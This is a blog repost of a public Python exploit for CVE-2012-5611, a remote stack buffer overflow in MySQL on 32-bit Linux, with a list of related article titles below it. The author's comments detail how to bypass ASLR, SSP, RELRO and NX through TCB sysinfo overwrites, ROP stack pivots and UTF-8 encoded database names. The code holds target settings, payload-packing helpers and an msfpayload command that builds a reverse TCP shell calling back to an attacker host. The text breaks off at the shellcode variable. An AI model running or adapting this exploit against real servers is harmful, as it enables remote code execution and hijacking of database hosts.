MySQL Stack Buffer Overflow Linux x86 32bits
2012-12-28 21:24
375 查看
测试方法:
程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!!/usr/bin/env python # 27/12/12 - status : public release # CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 ) # -------- Author : ipv # -------- Impact : high # -------- URL : http://blog.ring0.me/ # -------- Description # # The code below is linked to CVE-2012-5611, a flaw discovered by kingcope. # MySQL server is prone to a remote buffer overflow that # allow remote authenticated attacker to reach code execution in the # context of the user running MySQL instance (default: mysql user). # The vulnerability resides in acl_get function, called when authenticated # user requests a privileged Account Managment statement. MySQL fails # to verify user controlled data len of "db" parameter. # # end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db); # # The destination address of strcpy is located on a mmaped page dedicated to # user connection which allow a buffer overflow on adjacent memory. # # Differents attacks vector may be possiblea according the system. # FYI Microsoft Windows versions are as well vulnerables. #--------------------------------------------------------- # To bypass ASLR/SSP/RELRO/NX: #------------------------------------------------------------------------------ # I take profit of Threading-Model. This means MySQL use only one address # space for all MySQL ressources (data structures, network managment, # session, etc.). # To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of # TCB structure located more higher on the stack. # ROP chains aims to pivot to our controlled stack data. At this point, # if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT # deferencing technique since libc API relies on the sysinfo pointer # to call sysenter. # # So to accomplish code exec, afaik, you have two way : # 1 - Extract sysinfo of an intact TCB and use it as proxy call # (or you can restore the first sysinfo after doing modification on got) # -> i use it for redhat exploit (no SSP on redhat/centos); # -> this allow us to bypass relro/alsr/nx # relro. # 2 - Find a int0x80 / sysenter gadget in .text ; # (Bad instruction follow int0x80 gadget, you have a one shooter to get # code exec). So, i advise you to find a sysenter) # - i use sysenter for ubuntu 10.04 self-compiled with SSP. # - this allow us bypass relro/ssp/alsr/nx # # Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass # SSP/ASLR/NX. # #--------------------------------------------------------- # UTF-8 and ROP chains limitation : #--------------------------------------------------------- # Mysql Schema Object Name restricts database name to be alpha numeric # (and $ _). # To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is # done via MySQL when databasename is quoted with `` (mandatory to # successful exploit target). Yes the devil is in the details. # MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html # # For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net ######################################################################## # Modules # import pymysql import sys import struct import os, socket ######################################################################## # Authentication options # MYSQL_USER = "test" MYSQL_PASSWORD = "" #MYSQL_HOST = "192.168.130.147" MYSQL_HOST = "192.168.130.129" MYSQL_PORT = 3306 ######################################################################## # Helper # def _x(v): if isinstance(v, str): return v return struct.pack("<I", v) # TCP is used when we face to SSP class _TCB: tcb = 0 # updated later by a ret gadget dtv = "BBBB" _self = "CCCC" multiple_threads= "DDDD" sysinfo = 0 # SEIP - updated later by stack pivot gadget stack_guard = "AAAA" pointer_guard = 0 # updated later by a pop pop ret gadget # base class class rc_base: eip_off = 0 align_payload = 0 align_stack = 2048 retsled = "" safe_overwrite = "" pivot = "" pppr = "" ppr = "" # ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp # XXX - CHANGEME ! sc_rev_tcp =
相关文章推荐
- roome-ELF x86 - Stack buffer overflow basic 3
- MySQL with yaSSL SSL Certificate Handling Remote Stack Buffer Overflow Vulnerability
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- [2014-03-13 08:46:42 - Dex Loader] Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- 64位centos6.7安装mysql-5.7.9-linux-glibc2.5-x86_64.tar.gz
- 通用二进制安装mysql-5.7.11-linux-glibc2.5-x86_64
- 【嵌入式安全扫盲一】Stack buffer overflow
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- 64位Linux下安装mysql-5.7.13-linux-glibc2.5-x86_64
- Centos7安装mysql-5.6.22-linux-glibc2.5-x86_64.tar.gz
- MySql(30)------linux下安装mysql-5.7.12-linux-glibc2.5-x86_64.tar.gz(centos)
- How To Install Linux, Nginx, MySQL, PHP (LEMP) Stack on Debian 7
- 福昕阅读器 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow
- centos6.5安装mysql-advanced-5.7.9-linux-glibc2.5-x86_64.tar.gz为mysql service
- “System.StackOverflowException”类型的未经处理的异常在 MySql.Data.dll 中发生”的错误处理
- [mysql使用(0)] 64位Linux下安装mysql-5.7.13-linux-glibc2.5-x86_64
- 64位centos6安装mysql-5.7.13-linux-glibc2.5-x86_64.tar.gz
- How To Install Linux, Apache, MySQL, PHP (LAMP) stack on Ubuntu 16.04
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- mysql 安装 mysql-5.1.73-linux-x86_64-glibc23